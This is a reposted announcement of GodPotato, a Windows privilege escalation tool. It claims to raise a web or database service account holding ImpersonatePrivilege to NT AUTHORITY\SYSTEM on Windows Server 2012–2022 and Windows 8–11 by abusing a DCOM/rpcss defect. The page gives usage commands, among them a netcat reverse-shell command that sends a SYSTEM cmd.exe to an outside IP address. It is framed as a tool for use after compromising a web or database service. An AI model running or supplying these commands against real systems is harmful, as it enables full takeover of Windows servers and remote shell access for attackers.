GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM
2023-5-30 20:30:0 Author: www.kitploit.com(查看原文) 阅读量:35 收藏

Based on the history of Potato privilege escalation for 6 years, from the beginning of RottenPotato to the end of JuicyPotatoNG, I discovered a new technology by researching DCOM, which enables privilege escalation in Windows 2012 - Windows 2022, now as long as you have "ImpersonatePrivilege" permission. Then you are "NT AUTHORITY\SYSTEM", usually WEB services and database services have "ImpersonatePrivilege" permissions.

Potato privilege escalation is usually used when we obtain WEB/database privileges. We can elevate a service user with low privileges to "NT AUTHORITY\SYSTEM" privileges. However, the historical Potato has no way to run on the latest Windows system. When I was researching DCOM, I found a new method that can perform privilege escalation. There are some defects in rpcss when dealing with oxid, and rpcss is a service that must be opened by the system. , so it can run on almost any Windows OS, I named it GodPotato

Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11

Use the program's built-in Clsid for privilege escalation and execute a simple command

GodPotato -cmd "cmd /c whoami"

Customize Clsid and execute commands

Execute reverse shell commands

GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

zcgonvh

skay

GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM Reviewed by Zion3R on 8:30 AM Rating: 5


文章来源: http://www.kitploit.com/2023/05/godpotato-local-privilege-escalation.html
如有侵权请联系:admin#unsafe.sh